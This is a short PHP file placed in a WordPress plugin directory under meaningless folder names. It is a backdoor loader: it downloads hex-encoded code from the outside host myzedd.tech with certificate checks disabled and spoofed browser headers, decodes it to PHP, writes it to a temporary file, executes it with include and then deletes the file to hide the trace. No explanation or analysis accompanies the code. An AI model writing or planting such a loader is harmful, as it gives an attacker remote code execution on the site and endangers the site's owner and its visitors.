File: /www/wwwroot/www.213n.cn/wp-content/plugins/Cexom/name/kamu/awp-ciin.php
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://myzedd.tech/project/hex');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Host: myzedd.tech',
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept: */*'
]);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, 'https://google.com');
$hex = curl_exec($ch);
curl_close($ch);
if ($hex) {
$php = hex2bin($hex);
$tmp = sys_get_temp_dir() . '/' . uniqid() . '.php';
file_put_contents($tmp, $php);
include($tmp);
unlink($tmp);
}
?>